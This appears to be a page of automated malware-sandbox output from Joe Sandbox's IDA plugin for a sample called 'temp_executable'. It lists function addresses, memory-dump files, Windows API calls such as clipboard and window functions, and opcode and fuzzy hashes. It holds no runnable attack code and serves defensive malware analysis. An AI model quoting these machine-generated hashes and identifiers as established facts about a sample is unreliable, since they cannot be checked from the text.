Instruction ID: daffee56cff3449dcbb4137def51be3a91a18f479c7a83d3cfbacc1341d0861c
Opcode Fuzzy Hash: 2055f3684f89d12955c89d5897dd2bc7c09d5fc49183ee4530ab0994b327db33
Instruction Fuzzy Hash: 5190026131510892E504A1584504706005587E1202F51C457B3244514CC53D8CA56225

Function 33942ED0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59c90a892c0dfe18c86388dd8552e2c63edbfe3d471d2524f294b39407eaf008
Instruction ID: 999836a9829fafcd3cd142ce0282eafc9a6a18f17dca685b780999df7f9fa6d8
Opcode Fuzzy Hash: 59c90a892c0dfe18c86388dd8552e2c63edbfe3d471d2524f294b39407eaf008
Instruction Fuzzy Hash: E3900221705108925540B16889449064015ABE1212751C566B1A88510DC56D88A96765

Function 33942EC0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed20d038e5c735c637aea08ca3cd986eb907f679f701dc24fce91ef7b2213aef
Instruction ID: 78a45aee300e3ff0c8892d6a232f9e7c6edb690fefad629fddc3ad8514455780
Opcode Fuzzy Hash: ed20d038e5c735c637aea08ca3cd986eb907f679f701dc24fce91ef7b2213aef
Instruction Fuzzy Hash: B390023130550C52E500A1584908747001587D0303F51C456B6254515EC679C8D57631

Function 33942E00 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c101838a8e5dbff652f21665ca788c7d968655a20037aa003d83c8c8305c3efc
Instruction ID: 7d931a2006d4f2692f14835eabaa4cfbc62fceb20de011623f4984ac4812a5ba
Opcode Fuzzy Hash: c101838a8e5dbff652f21665ca788c7d968655a20037aa003d83c8c8305c3efc
Instruction Fuzzy Hash: 8490026130550C53E540A5584904607001587D0303F51C456B3154515ECA3D8C957235

Function 33942E50 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5aa8bdfbd778112320b7fb494e2bcd00ce78119b6adcce0e80a47addab073b85
Instruction ID: 30227f29dc6497afc638a271e32ee280276bfe5031b4231734469be2dce8d10c
Opcode Fuzzy Hash: 5aa8bdfbd778112320b7fb494e2bcd00ce78119b6adcce0e80a47addab073b85
Instruction Fuzzy Hash: 2F90026134510C92E500A1584514B060015C7E1302F51C45AF2154514DC62DCC967226

Function 33942DA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d1c2e86993d8b9279f065eac6234a0204c6f93581c2f7d86a5dc3128aa0a0c1
Instruction ID: 169fad0d89cb7f762317f6571dd8b766e78c6871b2f20178b38dd650b36b6515
Opcode Fuzzy Hash: 3d1c2e86993d8b9279f065eac6234a0204c6f93581c2f7d86a5dc3128aa0a0c1
Instruction Fuzzy Hash: 5E90022170510D52E501B1584504616001A87D0242F91C467B2114515ECA3989D6B231

Function 33942DC0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3962d9faa68123ad6fc8953738e97004d8208a18444201df01ec90a0c769f9f
Instruction ID: cc3809ab3c274c38376c6ced31fe5be72a28ebc7f0e68ad1ecd3f55ae862d67e
Opcode Fuzzy Hash: f3962d9faa68123ad6fc8953738e97004d8208a18444201df01ec90a0c769f9f
Instruction Fuzzy Hash: CB90027130510C52E540B1584504746001587D0302F51C456B6154514EC66D8DD97765

Function 33942D50 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89cb86f92459fc2ee76b49422b233e5885c8928bbfbdb73b8c7ea3cbcc81cb2f
Instruction ID: 624458a1050d1f22bfecee55ec0490b1963d08898980576cc10c7cbe49981b7a
Opcode Fuzzy Hash: 89cb86f92459fc2ee76b49422b233e5885c8928bbfbdb73b8c7ea3cbcc81cb2f
Instruction Fuzzy Hash: 1090022130510C52E502A15845146060019C7D1346F91C457F2514515DC6398997B232

Function 33943C90 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34599ec3d4c0a90f3eeabfc2df6a331a38bb0e97f92e8966d7dfa1f1d186cd23
Instruction ID: eae0531525e68cf27e5d007e6cfc469200adfd91876a54d14e68c1f427c28e6c
Opcode Fuzzy Hash: 34599ec3d4c0a90f3eeabfc2df6a331a38bb0e97f92e8966d7dfa1f1d186cd23
Instruction Fuzzy Hash: AF90023530510C52E910A1585904646005687D0302F51D856B1514518DC66888E5B221

Function 33942CD0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2e9f0cbfc36d642930f28235355ad67edd7dede1ba101d5d7912d5530cf54ee
Instruction ID: a666285e7af43c7b96e58552e23c79abe72813f6c2b51ab8b74b31b7d17b63a8
Opcode Fuzzy Hash: e2e9f0cbfc36d642930f28235355ad67edd7dede1ba101d5d7912d5530cf54ee
Instruction Fuzzy Hash: 9190023134510C52E541B1584504606001997D0242F91C457B1514514EC6698A9ABB61

Function 33942CF0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cfd5cde95ae65f6b1102387be002b8d1794be50ab78723c6c7183c3f3b2c849d
Instruction ID: 913d4b0763caf0344baefe9635eab96506bb1c1d19ad9d4e3a7fa0b00d525e87
Opcode Fuzzy Hash: cfd5cde95ae65f6b1102387be002b8d1794be50ab78723c6c7183c3f3b2c849d
Instruction Fuzzy Hash: ED900221346149A26945F1584504507401697E0242791C457B2504910CC53A989AE721

Function 33942C10 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9a4959259b0f8aba224f253d29064e0cf23e72861f45dc4169fd7cea096a565
Instruction ID: c643f58bab85ebba326302c77d6a0d36479790c0eede58337ff637ada683ec36
Opcode Fuzzy Hash: f9a4959259b0f8aba224f253d29064e0cf23e72861f45dc4169fd7cea096a565
Instruction Fuzzy Hash: A290023130510C53E500A1585608707001587D0202F51D856B1514518DD66A88957221

Function 33943C30 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a393468779feef13416de50986554b8e71f6585752da5835cfef71d7807ecd47
Instruction ID: dbb90c1088c2d9340f309545f830c2fa78cc8f62e119e46ed441a7fac0aeaacb
Opcode Fuzzy Hash: a393468779feef13416de50986554b8e71f6585752da5835cfef71d7807ecd47
Instruction Fuzzy Hash: 2C90023130610992A940A2585904A4E411587E1303B91D85AB1105514CC92888A56321

Function 33942C30 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dcde240079ee2757aa84dc82a6aab704e124a6d29c2dbfeafe4e884e402a0127
Instruction ID: d345d3417064e15e0090d4b6fedc0af50cdd7426aa800a5ea0add483ee2e82b3
Opcode Fuzzy Hash: dcde240079ee2757aa84dc82a6aab704e124a6d29c2dbfeafe4e884e402a0127
Instruction Fuzzy Hash: 7D90022931710852E580B158550860A001587D1203F91D85AB1105518CC92988AD6321

Function 33942C20 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c6839e7af72941e388fe3bcce93309c18be4116c77d17c2b518b9c6f4e878e9
Instruction ID: c975ffd83f0bc9f22a2df2c21803692278a6dddae7deb4ce9b5078b328910c44
Opcode Fuzzy Hash: 5c6839e7af72941e388fe3bcce93309c18be4116c77d17c2b518b9c6f4e878e9
Instruction Fuzzy Hash: 0790022130914C92E500A5585508A06001587D0206F51D456B2154555DC6398895B231

Function 33942C50 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae7e7e494081faea9fd3643774ba40876f35945af41e844c6c268487516124fd
Instruction ID: 038c5f1626f3faa895e9e58328d924c1040e4cd1bc19d3b3343b982e21604640
Opcode Fuzzy Hash: ae7e7e494081faea9fd3643774ba40876f35945af41e844c6c268487516124fd
Instruction Fuzzy Hash: 8290022130510853E540B15855186064015D7E1302F51D456F1504514CD929889A6322

Function 33942B20 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: cbf2ddde37432a230e1ec7466d7660ee9db19cd8af14b735b234d0989fa3ad20
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Function 335FE020 Relevance: 57.7, Strings: 46, Instructions: 211
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@@@@, xrefs: 335FE13B
@@@@, xrefs: 335FE196
@@@@, xrefs: 335FE1F1
@@@@, xrefs: 335FE1A4
@@@?, xrefs: 335FE093
@@@@, xrefs: 335FE1AB
@@@@, xrefs: 335FE1F8
@@@@, xrefs: 335FE18F
)*+,, xrefs: 335FE10A
@@@@, xrefs: 335FE1D5
@@@@, xrefs: 335FE181
@@@@, xrefs: 335FE15E
!"#$, xrefs: 335FE0FC
@, xrefs: 335FE0B6
@@@@, xrefs: 335FE1CE
@@@@, xrefs: 335FE1EA
@@@@, xrefs: 335FE1B2
@@@@, xrefs: 335FE1DC
@@@@, xrefs: 335FE16C
@@@@, xrefs: 335FE126
@@@@, xrefs: 335FE19D
123@, xrefs: 335FE118
@@@@, xrefs: 335FE1FF
@@@@, xrefs: 335FE188
4567, xrefs: 335FE09A
@@@@, xrefs: 335FE173
%&'(, xrefs: 335FE103
@@@@, xrefs: 335FE165
-./0, xrefs: 335FE111
?, xrefs: 335FE210
@@@@, xrefs: 335FE134
@@@@, xrefs: 335FE0AF
@@@@, xrefs: 335FE1E3
@@@@, xrefs: 335FE150
@@@@, xrefs: 335FE149
@@@@, xrefs: 335FE142
@@@@, xrefs: 335FE1B9
@@@@, xrefs: 335FE1C7
@@@@, xrefs: 335FE17A
89:;, xrefs: 335FE0A1
<=@@, xrefs: 335FE0A8
@@@@, xrefs: 335FE12D
@@@@, xrefs: 335FE1C0
@@@@, xrefs: 335FE157
@@@@, xrefs: 335FE0E7
@@@@, xrefs: 335FE11F

Memory Dump Source

Source File: 00000002.00000002.13517923090.00000000335F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 335F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_335f0000_temp_executable.jbxd

Similarity

API ID:
String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
API String ID: 0-3754132690
Opcode ID: fdc7e8973fa29a8e9ded732f7d65128a49cab7f9a4b461baca6ac5a47474afa8
Instruction ID: b9fae74821b39ab8a90a263f492fe5e7814b7471e04e232e1fb6e3290eee58bc
Opcode Fuzzy Hash: fdc7e8973fa29a8e9ded732f7d65128a49cab7f9a4b461baca6ac5a47474afa8
Instruction Fuzzy Hash: 12915FF04483948AC7158F54A0652AFFFB1EBC6305F15816DE7E6BB243C3BE89058B85

Function 00404FBA Relevance: 54.3, APIs: 36, Instructions: 280
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 0040501A
GetDlgItem.USER32(?,000003EE), ref: 00405029
GetClientRect.USER32(?,?), ref: 00405066
GetSystemMetrics.USER32(00000015), ref: 0040506E
SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 0040508F
SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004050A0
SendMessageA.USER32(?,00001001,00000000,?), ref: 004050B3
SendMessageA.USER32(?,00001026,00000000,?), ref: 004050C1
SendMessageA.USER32(?,00001024,00000000,?), ref: 004050D4
ShowWindow.USER32(00000000,?,0000001B,?), ref: 004050F6
ShowWindow.USER32(?,00000008), ref: 0040510A
GetDlgItem.USER32(?,000003EC), ref: 0040512B
SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 0040513B
SendMessageA.USER32(00000000,00000409,00000000,?), ref: 00405154
SendMessageA.USER32(00000000,00002001,00000000,?), ref: 00405160
GetDlgItem.USER32(?,000003F8), ref: 00405038

Part of subcall function 00403EB4: SendMessageA.USER32(00000028,?,00000001,00403CE5), ref: 00403EC2

GetDlgItem.USER32(?,000003EC), ref: 0040517C
CreateThread.KERNEL32(00000000,00000000,Function_00004F4E,00000000), ref: 0040518A
CloseHandle.KERNEL32(00000000), ref: 00405191
ShowWindow.USER32(00000000), ref: 004051B4
ShowWindow.USER32(?,00000008), ref: 004051BB
ShowWindow.USER32(00000008), ref: 00405201
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405235
CreatePopupMenu.USER32 ref: 00405246
AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 0040525B
GetWindowRect.USER32(?,000000FF), ref: 0040527B
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405294
SendMessageA.USER32(?,0000102D,00000000,?), ref: 004052D0
OpenClipboard.USER32(00000000), ref: 004052E0
EmptyClipboard.USER32 ref: 004052E6
GlobalAlloc.KERNEL32(00000042,?), ref: 004052EF
GlobalLock.KERNEL32(00000000), ref: 004052F9
SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040530D
GlobalUnlock.KERNEL32(00000000), ref: 00405326
SetClipboardData.USER32(00000001,00000000), ref: 00405331
CloseClipboard.USER32 ref: 00405337

Memory Dump Source

Source File: 00000002.00000002.13500514197.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.13500419295.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500613130.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500695429.0000000000409000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500755233.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID:
API String ID: 590372296-0
Opcode ID: dc34fc556bad12f44983f0eb864ab1da9e583e0f341f6de52293841b1f9fa6d2
Instruction ID: 3b51e898b73edb3ed70f647c70819dce3e7a22bfcdd564ae392b58196c58e3f7
Opcode Fuzzy Hash: dc34fc556bad12f44983f0eb864ab1da9e583e0f341f6de52293841b1f9fa6d2
Instruction Fuzzy Hash: 59A14871D00208BFEB21AFA0DD85AAE7F79FB04354F10417AFA01BA1A0C7755E519FA9

Function 004039AC Relevance: 48.3, APIs: 32, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039E8
ShowWindow.USER32(?), ref: 00403A05
DestroyWindow.USER32 ref: 00403A19
SetWindowLongA.USER32(?,00000000,00000000), ref: 00403A35
GetDlgItem.USER32(?,?), ref: 00403A56
SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403A6A
IsWindowEnabled.USER32(00000000), ref: 00403A71
GetDlgItem.USER32(?,00000001), ref: 00403B1F
GetDlgItem.USER32(?,00000002), ref: 00403B29
SetClassLongA.USER32(?,000000F2,?), ref: 00403B43
SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403B94
GetDlgItem.USER32(?,00000003), ref: 00403C3A
ShowWindow.USER32(00000000,?), ref: 00403C5B
EnableWindow.USER32(?,?), ref: 00403C6D
EnableWindow.USER32(?,?), ref: 00403C88
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403C9E
EnableMenuItem.USER32(00000000), ref: 00403CA5
SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403CBD
SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403CD0
lstrlenA.KERNEL32(00429820,?,00429820,0042DBA0), ref: 00403CF9
SetWindowTextA.USER32(?,00429820), ref: 00403D08
ShowWindow.USER32(?,0000000A), ref: 00403E3C

Memory Dump Source

Source File: 00000002.00000002.13500514197.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.13500419295.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500613130.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500695429.0000000000409000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500755233.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd

Similarity

API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
String ID:
API String ID: 184305955-0
Opcode ID: 310d8fcbc6eabea70a8aba8d1eb49e4f8d273076e684e92c31801281a4a4f8a6
Instruction ID: 70023f4bb34e935c1cca3693f676be707b54b1f0636591b75eec942e7e5b916a
Opcode Fuzzy Hash: 310d8fcbc6eabea70a8aba8d1eb49e4f8d273076e684e92c31801281a4a4f8a6
Instruction Fuzzy Hash: F7C1B171A04200BBEB216F61ED45E2B3EACEB49706F50053EF541B21E1C779A942DB6E

Function 0040361A Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 216
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00405EBC: GetModuleHandleA.KERNEL32(?,?,?,00403127,00000008), ref: 00405ECE
Part of subcall function 00405EBC: LoadLibraryA.KERNEL32(?,?,?,00403127,00000008), ref: 00405ED9
Part of subcall function 00405EBC: GetProcAddress.KERNEL32(00000000,?), ref: 00405EEA

lstrcatA.KERNEL32(00435000,00429820,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429820,00000000,00000006,00435400,764D3410,00434000,00000000), ref: 00403695
lstrlenA.KERNEL32(0042D340,?,?,?,0042D340,00000000,00434400,00435000,00429820,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429820,00000000,00000006,00435400), ref: 0040370A
lstrcmpiA.KERNEL32(?,.exe), ref: 0040371D
GetFileAttributesA.KERNEL32(0042D340), ref: 00403728
LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,00434400), ref: 00403771

Part of subcall function 00405AEF: wsprintfA.USER32 ref: 00405AFC

RegisterClassA.USER32(0042DB40), ref: 004037AE
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004037C6
CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 004037FB
ShowWindow.USER32(00000005,00000000), ref: 00403831
LoadLibraryA.KERNEL32(RichEd20), ref: 00403842
LoadLibraryA.KERNEL32(RichEd32), ref: 0040384D
GetClassInfoA.USER32(00000000,RichEdit20A,0042DB40), ref: 0040385D
GetClassInfoA.USER32(00000000,RichEdit,0042DB40), ref: 0040386A
RegisterClassA.USER32(0042DB40), ref: 00403873
DialogBoxParamA.USER32(?,00000000,004039AC,00000000), ref: 00403892

Strings

.DEFAULT\Control Panel\International, xrefs: 00403680
Control Panel\Desktop\ResourceLocale, xrefs: 0040364E
RichEdit20A, xrefs: 00403855, 0040385B
RichEd32, xrefs: 00403848
RichEd20, xrefs: 0040383D
.exe, xrefs: 00403717
RichEdit, xrefs: 00403864
_Nb, xrefs: 0040378D, 004037F5

Memory Dump Source

Source File: 00000002.00000002.13500514197.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.13500419295.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500613130.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500695429.0000000000409000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500755233.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd

Similarity

API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 914957316-2904746566
Opcode ID: 3261aa810d1dd6b7c581231881c95c7173fed056fd42999ef2631fafeb1d8368
Instruction ID: d178aa451f166566eaf2c3163fe56623853c288c4747cf6087cde58c0eecb14b
Opcode Fuzzy Hash: 3261aa810d1dd6b7c581231881c95c7173fed056fd42999ef2631fafeb1d8368
Instruction Fuzzy Hash: 2961B4B1B442406ED620AF629C45F273EACE745749F40457EF904B72E1C77DAD02CA2D

Function 00403FC8 Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 205
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404053
GetDlgItem.USER32(00000000,000003E8), ref: 00404067
SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00404085
GetSysColor.USER32(?), ref: 00404096
SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004040A5
SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004040B4
lstrlenA.KERNEL32(?), ref: 004040B7
SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004040C6
SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004040DB
GetDlgItem.USER32(?,0000040A), ref: 0040413D
SendMessageA.USER32(00000000), ref: 00404140
GetDlgItem.USER32(?,000003E8), ref: 0040416B
SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004041AB
LoadCursorA.USER32(00000000,00007F02), ref: 004041BA
SetCursor.USER32(00000000), ref: 004041C3
